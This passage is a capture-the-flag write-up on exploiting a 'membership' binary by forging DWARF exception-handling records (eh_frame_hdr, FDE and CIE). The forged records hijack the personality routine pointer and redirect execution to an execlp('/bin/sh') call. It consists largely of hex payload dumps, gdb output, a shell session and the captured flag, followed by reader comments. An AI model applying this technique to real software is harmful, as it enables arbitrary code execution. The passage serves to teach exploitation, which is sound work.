Breakpoint 1, 0x0804901a in ?? () (gdb) x/20wx 0x402eb118 0x402eb118: 0x4002501c 0x00000000 0x402cf000 0x402e9038 0x402eb128: 0x402cf000 0x402cf0b4 0x402cf074 0x402eb168 0x402eb138: 0x401e5000 0x402c1086 0x401e5000 0x401e50d4 0x402eb148: 0x401e5074 0x402eb120 0x08048000 0x08049840 0x402eb158: 0x00000000 0x080480f4 0x080480b4 0x402eb138 (gdb) x/20wx 0x4002501c 0x4002501c: 0x00000000 0xffffffff 0x00000000 0x40025034 0x4002502c: 0x43434343 0x00000000 0x6474e550 0x44444444 0x4002503c: 0x40025054 0x45454545 0x46464646 0x47474747 0x4002504c: 0x48484848 0x49494949 0x00000000 0x00000000 0x4002505c: 0x00000000 0x00000000 0x00000000 0x00000000 (gdb) x/20wx 0x40025034 0x40025034: 0x6474e550 0x44444444 0x40025054 0x45454545 0x40025044: 0x46464646 0x47474747 0x48484848 0x49494949 0x40025054: 0x00000000 0x00000000 0x00000000 0x00000000 0x40025064: 0x00000000 0x00000000 0x00000000 0x00000000 0x40025074: 0x00000000 0x00000000 0x00000000 0x00000000 |
So, this payload basically lets us to execute goto found; code (unwind-dw2-fde-dip.c:225) since the data->pc will be in between pc_low and pc_high.
Then, on line 315, hdr is calculated by adding p_eh_frame_hdr->p_vaddr and load_base, thus pointing 0x40025054.
Time to build a fake hdr struct!
4-3. hdr & table construction
Starting at +0x54 from our buffer comes the hdr struct.
It’s a 4 byte struct and we fill in reasonable values here, according to the encoding scheme mentioned above.
1 2 3 4 5 |
*hdr: | version = 0x01 | eh_frame_ptr_enc = 0x1b (DW_EH_PE_pcrel | DW_EH_PE_sdata4) | fde_count_enc = 0x03 (DW_EH_PE_absptr | DW_EH_PE_udata4) | table_enc = 0x3b (DW_EH_PE_datarel | DW_EH_PE_sdata4) |
Then, as we saw earlier, eh_frame is read. Since the value is supposedly encoded with (DW_EH_PE_pcrel | DW_EH_PE_sdata4) , this value in our data should be an offset from where the hdr is. However, the value of eh_frame isn’t really related to what we do, so we can put any value (read_encoded_value_with_base actually does the calculation given the base to correctly compute eh_frame’s value).
Ok, next check is the following:
1 2 |
if (hdr->fde_count_enc != DW_EH_PE_omit && hdr->table_enc == (DW_EH_PE_datarel | DW_EH_PE_sdata4)) |
We have picked the values for encoding schems such that we satisfy both conditions.
Then, fde_count is read.
Since we do not want to create more than one set of fake structs (to be searched with binary search later), we will force this to be 1.
So with this data appended, we so far have this as our payload:
1 2 3 4 5 6 |
00000000 73 74 64 63 68 70 69 65 0a 41 18 b1 2e 40 1c 50 |[email protected]| 00000010 02 40 41 41 41 41 41 42 41 42 42 42 00 00 00 00 |.@AAAAABABBB....| 00000020 ff ff ff ff 00 00 00 00 34 50 02 40 43 43 43 43 |........4P.@CCCC| 00000030 00 00 00 00 50 e5 74 64 44 44 44 44 54 50 02 40 |....P.tdDDDDTP.@| 00000040 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH| 00000050 49 49 49 49 01 1b 03 3b 4a 4a 4a 4a 01 00 00 00 |IIII...;JJJJ....| |
Then, the table comes next. fde_table struct has two fields: initial_loc and fde.
As mentioned earlier, in order for the search to succeed, we need to satisfy table[mid].initial_loc + data_base <= data->pc < table[mid].initial_loc + data_base + range .
Note that data_base is pointing at hdr (0x40025054). So we can set initial_loc to 0xBFFDAFAC such that initial_loc + data_base == 0x40025054 + 0xBFFDAFAC == 0x0 .
Also, the fde field is actually an (signed) offset from hdr — due to (DW_EH_PE_datarel | DW_EH_PE_sdata4) encoding. So, we set it to 0x14 to indicate that our fake dwarf_fde struct will be located at 0x40025068.
Fake hdr and table construction is done, and we now have this:
1 2 3 4 5 6 7 |
00000000 73 74 64 63 68 70 69 65 0a 41 18 b1 2e 40 1c 50 |[email protected]| 00000010 02 40 41 41 41 41 41 42 41 42 42 42 00 00 00 00 |.@AAAAABABBB....| 00000020 ff ff ff ff 00 00 00 00 34 50 02 40 43 43 43 43 |........4P.@CCCC| 00000030 00 00 00 00 50 e5 74 64 44 44 44 44 54 50 02 40 |....P.tdDDDDTP.@| 00000040 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH| 00000050 49 49 49 49 01 1b 03 3b 4a 4a 4a 4a 01 00 00 00 |IIII...;JJJJ....| 00000060 ac af fd bf 14 00 00 00 |........| |
The current payload, when fed to the program, will result in a crash since it will read an invalid value for the range.
To make
data->pc < initial_loc + data_base + range true, we need to construct a fake dwarf_fde now.
4-4. fde & cie construction
As a final step, we are going to construct fde and cie records in our payload.
dwarf_fde struct has length, CIE_delta, and pc_begin fields (followed by fde_augmentation length, which should be 0).
We are going to make the length 0x1C, and CIE_delta to 0xFFFFFFE4 (such that &CIE_delta - CIE_delta == 0x40025088 — this will be explained later). We will set pc_begin to 0x0 (doesn’t really matter what we put here).
What comes after pc_begin is the range. To explain a little bit, on line 412 in unwind-dw2-fde-dip.c, range is read from f->pc_begin[f_enc_size] where f_enc_size is 4, making the 4 byte right after pc_begin be the range. Since we made the init_loc to be 0x0, we will make the range to be 0xFFFFFFFF. Then, we pad the last few bytes (so, technically we can fix the length, but that’s what we used during the competition).
This yields our payload to be:
1 2 3 4 5 6 7 8 9 |
00000000 73 74 64 63 68 70 69 65 0a 41 18 b1 2e 40 1c 50 |[email protected]| 00000010 02 40 41 41 41 41 41 42 41 42 42 42 00 00 00 00 |.@AAAAABABBB....| 00000020 ff ff ff ff 00 00 00 00 34 50 02 40 43 43 43 43 |........4P.@CCCC| 00000030 00 00 00 00 50 e5 74 64 44 44 44 44 54 50 02 40 |....P.tdDDDDTP.@| 00000040 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH| 00000050 49 49 49 49 01 1b 03 3b 14 00 00 00 01 00 00 00 |IIII...;........| 00000060 ac af fd bf 14 00 00 00 1c 00 00 00 e4 ff ff ff |................| 00000070 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 |................| 00000080 00 00 00 00 00 00 00 00 |........| |
We are almost there!!!
Above payload will result in data->ret to contain a pointer to our FDE struct and return to _Unwind_Find_FDE.
In _Unwind_Find_FDE, nothing interesting happens, and the same (a pointer to our fake FDE struct) is returned.
We are now back to uw_frame_state_for function (line 1180 in unwind-dw2.c). Since fde is not null, extract_cie_info is called with the cie pointer that is based on our fde.
1 2 3 4 5 6 7 |
1195 1196 cie = get_cie (fde); 1197 insn = extract_cie_info (cie, context, fs); 1198 if (insn == NULL) 1199 /* CIE contained unknown augmentation. */ 1200 return _URC_FATAL_PHASE1_ERROR; 1201 |
152 153 154 155 156 157 158 |
/* Locate the CIE for a given FDE. */ static inline const struct dwarf_cie * get_cie (const struct dwarf_fde *f) { return (const void *)&f->CIE_delta - f->CIE_delta; } |
Looking at the get_cie function, we can see why we put 0xFFFFFFE4 for CIE_delta value in our FDE struct. With our setup, get_cie will return the CIE struct’s address, which will be right after our fake FDE struct (aka 0x40025088).
Now, we have 1 final function that we need to understand: extract_cie_info.
This function is mostly parsing stuff and filling in the _Unwind_Frame_State data based on the CIE record.
dwarf_cie struct has length, CIE_id, version, and augmentation — and depending on augmentation content, more data follows.
Here’s the values we set for our fake CIE struct:
1 2 3 4 5 6 7 8 9 10 11 12 13 |
*cie: | length = 0x1c | CIE_id = 0x0 | version = 0x1 | augmentation = 0x7a(z) 0x50(P) 0x4c(L) 0x52(R) 0x00(\0) - code_alignment = 0x01 (byte) - data_alignment = 0x7c (byte) - return_addr_col = 0x08 (byte) - augmentation_len = 0x07 (byte) - personality_enc = 0x00 (byte) - personality_ptr = 0x41424344 (4 bytes) - LSDA encoding = 0x00 (byte) - FDE_encoding = 0x1b (DW_EH_PE_pcrel | DW_EH_PE_sdata4) |
Data that follows after augmentation string (code_alignment, data_alignment, return_addr_col) are read in first.
We chose these values just because we saw these in normal CIE struct, but it shouldn’t matter what the values are.
Then, the rest of the data is parsed as augmentation contents (aka ‘zPLR’).
- If the first byte is ‘z’, it sets fs->saw_z flag and note that the length of the extra augmentation data (which follows the length itself) is 0x07.
- ‘P’ indicates a personality routine is specified in CIE (extra) augmentation, and basically read the personality_ptr value (4-byte) based on the personality_enc encoding scheme — which we set as 0x0 to make it absptr type.
- ‘L’ indicates a byte showing how the LSDA pointer is encoded. No idea what that is, but it’s not relevant — we put 0x0.
- ‘R’ indicates a byte indicating how FDE addresses are encoded. We put some sane value that we saw earlier, but shouldn’t matter either.
Alright, now with some padding bytes to make the total length 0x1c, we are set.
Thus far, we have built the following payload:
1 2 3 4 5 6 7 8 9 10 11 |
00000000 73 74 64 63 68 70 69 65 0a 41 18 b1 2e 40 1c 50 |[email protected]| 00000010 02 40 41 41 41 41 41 42 41 42 42 42 00 00 00 00 |.@AAAAABABBB....| 00000020 ff ff ff ff 00 00 00 00 34 50 02 40 43 43 43 43 |........4P.@CCCC| 00000030 00 00 00 00 50 e5 74 64 44 44 44 44 54 50 02 40 |....P.tdDDDDTP.@| 00000040 45 45 45 45 46 46 46 46 47 47 47 47 48 48 48 48 |EEEEFFFFGGGGHHHH| 00000050 49 49 49 49 01 1b 03 3b 14 00 00 00 01 00 00 00 |IIII...;........| 00000060 ac af fd bf 14 00 00 00 1c 00 00 00 e4 ff ff ff |................| 00000070 00 00 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 |................| 00000080 00 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 |................| 00000090 01 7a 50 4c 52 00 01 7c 08 07 00 44 43 42 41 00 |.zPLR..|...DCBA.| 000000a0 1b 00 00 00 |....| |
And corresponding output when we run this payload against the binary:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 |
(gdb) r < payload Starting program: /tmp/.ppp/./membership < payload userid :: password :: Program received signal SIGSEGV, Segmentation fault. 0x08048e01 in ?? () (gdb) c Continuing. nested Program received signal SIGSEGV, Segmentation fault. 0x08048cc5 in ?? () (gdb) Continuing. Program received signal SIGSEGV, Segmentation fault. 0x41424344 in ?? () (gdb) |
YAY!!! WE HAVE EIP CONTROL!!!!111!!11!
Ok, now on to the final and easiest step: getting a shell.
4-5. Give me a shell
Remember (from a while ago…) that there was code that does
execlp("/bin/sh", "/bin/sh", 0) ?
For those who don’t remember, it’s located at
0x8048E97 .
All we have to do at this point is to replace 0x41424344 (personality routine pointer) to 0x8048e97.
AND
1 2 3 4 5 6 |
$ cat payload - | /home/membership/membership userid :: password :: nested whoami membership cat /home/membership/key G4R4Ge_BaND_wANNAB3 |
Voila! We have our shell (and the flag, of course!)
5. Closing
I hope you enjoyed reading this write-up. (Although I suspect not.. due to its obscene length)
I apologize that this ended up being a LOT longer than I anticipated when I started writing, but I think it contains quite a bit of details that people can follow and reproduce the result.
Try it while their server is up!! Otherwise you will have to patch the binary such that the addresses work out.
Thank you for reading, and feel free to leave comments if you have any questions or suggestions.
Awesome writeup. Thanks for this.
awesome! thanks!!
Hi, thanks for your wonderful writeup!
Would you mind if I ask you couple questions?
I’m new to DWARF and I don’t understand how you analyze DW_OP_bra,
“the number of bytes of the DWARF expression to skip forward or backward”, it says in the documentation.
DW_OP_bra 50 , DW_OP_bra 29 and DW_OP_bra 8 all jumped to END in your example,
but I couldn’t figure out how to calculate that T_T.
Also, how do you find out that when you satisfy all conditions,
the SIGSEV exception handler dumps to 0x08048CE8? Thank you very much :)
Sure thing!
DW_OP_bra is a branch expression which tells you how many bytes of DWARF expression it needs to skip. So if you count the bytes from each of branch instruction, you can see that it’s pointing to the END in my example. We just found out it dumps you there since you see ‘nested’ printed out and set a breakpoint to double check.
WOW!!! Great job..
Amazing stuff .. keep a good work..
bye N.